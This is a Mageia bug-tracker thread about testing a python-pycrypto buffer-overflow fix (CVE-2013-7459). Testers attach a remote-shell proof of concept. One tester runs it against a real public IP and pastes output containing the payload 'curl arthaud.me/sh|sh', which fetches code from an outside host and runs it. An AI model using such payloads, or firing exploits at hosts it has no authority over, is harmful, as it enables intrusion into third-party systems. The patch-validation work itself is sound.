A CVE has been assigned for a security issue fixed upstream in python-pycrypto:
http://openwall.com/lists/oss-security/2016/12/27/8

The upstream commit to fix the issue is linked in the message above. It sounds like it's non-trivial to backport to 2.6.1. It also sounds like a serious issue.

Mageia 5 is also affected.
Whiteboard: (none) => MGA5TOO
python-pycrypto-2.6.1-6.1.mga5
python3-pycrypto-2.6.1-6.1.mga5
from python-pycrypto-2.6.1-6.1.mga5.src.rpm are in 5/core/updates_testing

This is a security fix for a possible buffer overflow.

ref:
http://openwall.com/lists/oss-security/2016/12/27/8
https://github.com/dlitz/pycrypto/commit/8dbe0dc3eea5c689d4f76b37b93fe216cf1f00d4
https://marc.info/?l=oss-security&m=148280482630855&w=2

Cauldron is also patched.
The rpm has its own test suite, run during the build, including for this issue.
Whiteboard: MGA5TOO => (none)
CVE: (none) => CVE-2013-7459
Assignee: makowski.mageia => qa-bugs
Version: Cauldron => 5
URL: (none) => https://lwn.net/Vulnerabilities/710478/
Prior to testing.

The most recent python-pycrypto bug:
https://bugs.mageia.org/show_bug.cgi?id=11491#c0
has some code for *that* problem which I shall attach here simply because it uses the same package. The output (after that old update) should be random.

https://marc.info/?l=oss-security&m=148280482630855&w=2
is a fantastically detailed & precise analysis of the bug, with a code exploit which I also will attach here. More 'for the record', since it concludes:
"After a few hours, I finally got a shell!"
CC: (none) => lewyssmith
Created attachment 8841
Random output test for python[3]-pycrypto

From bug 11491, this is just a little python script which uses the python-pycrypto package. The 4 lines of output should be random.
$ python[3] cryptoRandom.py
Created attachment 8842
POC for this bug, Python script to get a remote shell.

From https://marc.info/?l=oss-security&m=148280482630855&w=2 for info only. Written for Python3; may work for earlier. Expect it to run for hours before (pre-update only) giving a shell.
Testing M5_64

BEFORE update:
python-pycrypto-2.6.1-6.mga5
python3-pycrypto-2.6.1-6.mga5

$ python cryptoRandom.py
[u'11ebfa07b917df5b,1643424639ad0df8', u'1c75461b81e3808f,7476bd90682ace47', u'3de101081f86ac97,514d5e1c4abb325e', u'c62efc43f35b0b0b,14799ad508334985']
$ python3 cryptoRandom.py
[similar sort of O/P]

AFTER update:
python-pycrypto-2.6.1-6.1.mga5
python3-pycrypto-2.6.1-6.1.mga5

$ python cryptoRandom.py
[similar sort of correct O/P as previously]
$ python3 cryptoRandom.py
[similar sort of correct O/P as previously]

So the package still works, although its long POC was not specifically tested. From Comment 1: "The rpm has its own test suite, run during the build, including for this issue." OK.
Whiteboard: (none) => MGA5-64-OK
Advisory created from Comment 1, title, the references.
Whiteboard: MGA5-64-OK => MGA5-64-OK advisory
Testing on i586 virtualbox.
Thanks for the upload Lewis.

Before updating:
$ python cryptoRandom.py
[u'42364207b0dce3c2,29364e940c3c17c9', u'50a9812b90741463,3035440668d34d67', u'e8bfa75fdf36ad24,d2678147321a44a6', u'f2480379ff1dddac,64aba216bbe90636']
$ python3 cryptoRandom.py
['050e5d799b3ab7c8,26529743331d7995', '1d1bfaea7011db37,63d5549433c22325', '86c19227a42ef910,88527138e99cfe25', 'a5a45316ae36ed16,9197abb3d58ed85b']

Running 'python getShell.py' fails on a syntax error. Noting that the original was written for python3 I tried
$ python3 getShell.py
The syntax was accepted but the terminal filled with hundreds of echoes of the 'curl arthaud.me/sh|sh' command and ended on a connection failure:
curl%20arthaud.me%2fsh%7csh%00%00%00%d6%80%15%08 (Caused by ProtocolError('Connection aborted.', ConnectionRefusedError(111, 'Connection refused')))

I wonder if the address targeted needs to be changed to something accessible. No clue really.
$ dig 136.243.194.56
did not provide any useful information.
$ nslookup 136.243.194.56
Server: 192.168.1.1
Address: 192.168.1.1#53

Non-authoritative answer:
56.194.243.136.in-addr.arpa name = ip-136-243-194-56.bb.netbynets.de.

Maybe a German broadband provider?

Worth trying after the update though.
CC: (none) => tarazed25
After the update the functionality test worked fine as before, with python and python3. The PoC test with python3 behaved just as before with a final "Connection refused". Should the attempt to get a remote shell have been thwarted immediately if the fix had worked? I defer to a higher authority.
Also tried this:
$ curl "http://136.243.194.56:8000/cgi-bin/cryptmsg.py?what=enc&msg=AAAAAAAAAAAAAAAA&keyAAAAAAAAAAAAAAAA&mode=42&iv=AAAAAAAAAAAAAAAA"
curl: (7) Failed to connect to 136.243.194.56 port 8000: Connection refused
(In reply to Len Lawrence from comment #8)
> After the update the functionality test worked fine as before, with python
> and python3.

so you can validate

> The PoC test with python3 behaved just as before with a final "Connection
> refused".
> Should the attempt to get a remote shell have been thwarted immediately if
> the fix had worked? I defer to a higher authority.

the security issue is tested during the rpm build.
CC: (none) => makowski.mageia
Thanks Philippe. Letting it go then.
Keywords: (none) => validated_update
Whiteboard: MGA5-64-OK advisory => MGA5-64-OK MGA5-32-OK advisory
CC: (none) => sysadmin-bugs
An update for this issue has been pushed to the Mageia Updates repository.
http://advisories.mageia.org/MGASA-2017-0032.html
Resolution: (none) => FIXED
Status: NEW => RESOLVED